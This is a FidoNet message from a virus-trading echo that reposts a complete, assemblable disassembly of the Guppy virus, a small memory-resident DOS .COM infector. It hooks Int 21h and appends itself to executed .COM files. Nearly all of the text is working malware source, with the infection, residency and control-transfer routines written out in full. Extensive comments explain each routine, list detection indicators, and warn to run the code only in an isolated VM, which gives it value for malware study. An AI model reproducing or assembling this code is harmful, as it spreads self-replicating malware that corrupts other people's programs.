;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg  : 20 of 54
; From : MeteO                               2:5030/136      Tue 09 Nov 93 09:13
; To   : -  *.*  -                                           Fri 11 Nov 94 08:10
; Subj : GUPPY.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: Информация о вирусах -- "Information about viruses")
;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:39)
;* To   : Brad Frazee
;* Subj : GUPPY.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org
;***************************************************************************
;*                          The Guppy Virus                                *
;*                      Disassembly by Black Wolf                          *
;***************************************************************************
;*      The Guppy virus is a relatively simple, very small, resident .COM  *
;*infector.  It uses the standard way for a regular program to go resident *
;*(i.e. Int 27) which makes the infected program terminate the first time  *
;*run.  After that, however, infected files will run perfectly.  This virus*
;*uses interesting methods to restore the storage bytes, as well as a      *
;*strange technique to restore control to an infected file after it has    *
;*already gone memory resident.                                            *
;*                                                                         *
;*Note: The Guppy virus was originally assembled with an assembler other   *
;*      than Tasm, so to keep it exactly the same some commands must be    *
;*      entered directly as individual bytes.  In these cases, the command *
;*      is commented out and the bytes are found below it.                 *
;*                                                                         *
;***************************************************************************

.model tiny
.radix 16                          ;NOTE: every bare number in this file is HEX
.code

;---------------------------------------------------------------------------
; Installation stub -- the entry point of every infected .COM.
;
; !! Self-replicating DOS malware (historical "Guppy" sample).  Kept for
; !! analysis/education only.  Never assemble or run it outside an
; !! isolated, disposable VM with no shared folders and no network.
;
; Control arrives here through the E9 (JMP) the virus plants at the host's
; offset 100h, so this code runs at 100h + <original host length>, never at
; a fixed address.  All data references are therefore relative to SI
; (CALL/POP delta trick), and the hard-coded displacements used throughout
; (Int_21_Offset-103, 1F, 3D, 3F, 10, 40, 98) encode the exact byte layout
; of this file -- which is why instructions whose encoding differs between
; assemblers are forced in as raw bytes.
; .COM entry state relied upon: CS=DS=ES=SS=PSP segment.
;---------------------------------------------------------------------------
        org     100h
start:
        call    Get_Offset         ;Push the run-time address of Get_Offset

Get_Offset:
        pop     si                 ;SI = run-time offset of Get_Offset
                                   ;(= start+3; the CALL is 3 bytes long)
        mov     ax,3521h
        mov     bx,ax              ;AX=BX=3521h doubles as the residency
                                   ;probe recognised by Int_21_Handler
                                   ;(AL=21h and AX=BX)
        int     21h                ;Get Int 21 vector -> ES:BX.  If a copy
                                   ;is already resident this call does NOT
                                   ;return here: the handler restores the
                                   ;host's first 3 bytes and IRETs straight
                                   ;to CS:100.  The rest of this stub only
                                   ;runs on the first (installing) execution.

        mov     ds:[si+Int_21_Offset-103],bx      ;Save old Int 21 vector into
        mov     ds:[si+Int_21_Segment-103],es     ;the far-JMP operand at
                                   ;Go_Int_21.  103 = link-time value of SI
                                   ;(org 100h + 3), so SI+(label-103) is the
                                   ;label's run-time address.

        ;mov     dx,si             ;Bytes vary between assemblers, hence raw
        db      89,0f2

        ;add     dx,offset Int_21_Handler-104
        db      83,0c2,1f          ;DX = SI+1F = run-time Int_21_Handler.
                                   ;The byte 1F = Int_21_Handler-Get_Offset
                                   ;(the commented mnemonic says -104; the
                                   ;emitted byte is what runs).  Any byte
                                   ;added before the handler breaks this.

        mov     ah,25h
        int     21h                ;Set Int 21 vector = DS:DX (DS = PSP seg)

        inc     dh                 ;DX += 100h: bytes to keep resident =
                                   ;handler offset + 100h, which covers the
                                   ;98h-byte body (plus whatever follows it)
        push    cs
        pop     es
        int     27h                ;Terminate & stay resident.  The host's
                                   ;original 3 bytes are NOT restored on this
                                   ;path, so the first run of an infected
                                   ;program exits without ever running the
                                   ;host (as the header above notes).


;---------------------------------------------------------------------------
; Resident Int 21h filter.  Three cases:
;   AX=4B00h            -> Infect (EXEC of a program)
;   AL=21h and AX=BX    -> residency probe from an infected program's stub:
;                          restore the host's entry bytes and jump to them
;   anything else       -> chain to the saved vector at Go_Int_21
; Runs on the caller's stack with the caller's DS and SI still live; the
; probe path depends on both (SI = the stub's Get_Offset inside the newly
; loaded host image, DS = that host's PSP segment).
;---------------------------------------------------------------------------
Int_21_Handler:
        cmp     ax,4B00h           ;Is call a Load & Execute?
        je      Infect             ;Yes? Jump Infect

        cmp     al,21h             ;Might it be a residency check?
        jne     Go_Int_21          ;No? Chain to the original Int 21

        ;cmp     ax,bx             ;Are AX and BX the same?  Only the stub
        db      39,0d8             ;sets BX=AX before AH=35h -- but ANY
                                   ;program calling Int 21h with AX=BX=3521h
                                   ;is hijacked below in exactly the same way

        jne     Go_Int_21          ;No, chain to the original Int 21

        push    word ptr [si+3dh]  ;Caller's SI = stub's Get_Offset; 3dh =
                                   ;Storage_Bytes-Get_Offset, so this reads
                                   ;the first word of the host's original 3
                                   ;bytes from the copy inside the host
                                   ;image (NOT from this resident copy)

        mov     bx,offset ds:[100] ;100 = entry point of a .COM image
        pop     word ptr [bx]      ;DS is still the caller's = host PSP seg,
                                   ;so this repairs the host's bytes 100-101

        mov     cl,[si+3Fh]        ;Third original byte -> host's byte 102
        mov     [bx+2],cl          ;(CL and BX are clobbered; the stub never
                                   ;regains control, so it does not care)

Restore_Control:
        pop     cx                 ;Discard the interrupt return IP (it would
        push    bx                 ;re-enter the stub); replace it with 100h
        iret                            ;...so IRET lands at CS:100 = the
                                   ;restored host entry, with the caller's
                                   ;CS and FLAGS.  The host therefore starts
                                   ;with AX=3521h, BX=100h and CL/SI holding
                                   ;stub leftovers -- not the register state
                                   ;DOS gives a freshly loaded .COM, which
                                   ;can upset hosts that rely on it.

Storage_Bytes         db      0, 0, 0   ;The 3 host bytes displaced by the
                                   ;E9 jump.  Layout-critical: addressed as
                                   ;[si+3Dh]/[si+3Fh] above and as SI-10 /
                                   ;SI-40 in Infect; sits 40h past start.

;---------------------------------------------------------------------------
; Infect: runs on every EXEC (AX=4B00h) with DS:DX -> ASCIIZ path of the
; program about to be loaded.  Appends the 98h-byte virus body to that file
; and overwrites its first 3 bytes with a JMP to the appended code, then
; falls through to the real DOS EXEC, so the freshly infected file runs at
; once (its stub then hits the resident copy and the host is restored).
;
; Saves/restores AX, BX, DX, DS only; CX, SI, DI reach DOS modified
; (presumably harmless for EXEC, which does not take them as input).
;
; Analysis notes, all visible in the code below (useful for detection):
;  * No carry-flag check after any Int 21h call.  A failed open leaves a
;    DOS error code in AX that is then used as the file handle; the
;    remaining calls fail quietly and the file is left untouched.
;  * The only criterion is "first byte is E9h".  There is no infection
;    marker, so an already infected file (which now starts with E9h) is
;    infected AGAIN on every execution, growing by 98h bytes each time.
;  * No size check: only the low word of the EOF position is used, so a
;    .COM near the 64K limit is pushed past it.
;  * The read-only attribute is not cleared and the file date/time is not
;    preserved -- the timestamp change is an easy indicator.
;---------------------------------------------------------------------------
Infect:
        push    ax
        push    bx
        push    dx
        push    ds
        mov     ax,3D02h
        int     21h             ;Open DS:DX for Read/Write -> handle in AX
                                ;(no CF check, see notes above)

        xchg    ax,bx           ;BX = handle
        call    Get_Offset_Two

Get_Offset_Two:
        pop     si              ;SI = run-time offset of Get_Offset_Two
        push    cs
        pop     ds              ;DS = segment of the resident copy
        mov     ah,3F
        mov     cx,3
        sub     si,10           ;SI = Storage_Bytes (= Get_Offset_Two-10h)

        ;mov     dx,si
        db      89,0f2

        int     21h             ;Read the target's first 3 bytes into the
                                ;RESIDENT copy's Storage_Bytes (they travel
                                ;with the body written below).  If the read
                                ;failed the buffer still holds the previous
                                ;target's bytes and the E9 test uses those.

        cmp     byte ptr [si],0E9h      ;Infect only files that start with a
        jne     Close_File                   ;near JMP (skips MZ .EXE files)
        mov     ax,4202h
        xor     dx,dx
        xor     cx,cx
        int     21h                     ;Seek to EOF: DX:AX = file length

        xchg    ax,di                   ;DI = low word of length (DX ignored)
        mov     ah,40h
        mov     cl,98h                  ;CX = 98h (CH still 0): virus size.
                                        ;Appears to cover start..the EA
                                        ;opcode; the saved-vector words need
                                        ;not travel, the stub refills them
                                        ;at install (verify on a listing)

        ;mov     dx,si
        db      89,0f2

        sub     dx,40h                  ;DX = SI-40h = start of resident body
        int     21h                     ;Append the body at EOF

        mov     ax,4200h
        xor     cx,cx
        xor     dx,dx
        int     21h                     ;Seek back to offset 0

        mov     cl,3                    ;CX = 3 = write length, and...

        ;sub     di,cx
        db      29,0cf                  ;DI = length-3 = JMP displacement:
                                        ;103h + (len-3) = 100h + len, the
                                        ;load address of the appended body

        mov     [si+1],di               ;Patch displacement into Storage_Bytes
        mov     ah,40h                  ;(byte 0 is still the original E9h).
                                        ;This clobbers the resident copy's
                                        ;saved bytes, but the body is already
                                        ;written with the originals.

        ;mov     dx,si
        db      89,0f2

        int     21h                     ;Write E9 xx xx over the file start

Close_File:
        mov     ah,3Eh
        int     21h                     ;Close handle in BX (also reached with
                                        ;a bogus handle after a failed open)

        pop     ds
        pop     dx
        pop     bx
        pop     ax                      ;AX=4B00h again for the real EXEC
Go_Int_21:
        db      0EAh                    ;JMP FAR to the saved vector; the
Int_21_Offset   dw      ?               ;operand words are patched by the
Int_21_Segment  dw      ?               ;stub at install time (code and
                                        ;data deliberately overlap here)

end     start

;-+-  UC2 Support France
; + Origin: NETTIS Public Acces Internet (603)432-2517 (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
;    þ The MeÂeO
;
;/d            Warn if duplicate symbols in libraries
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)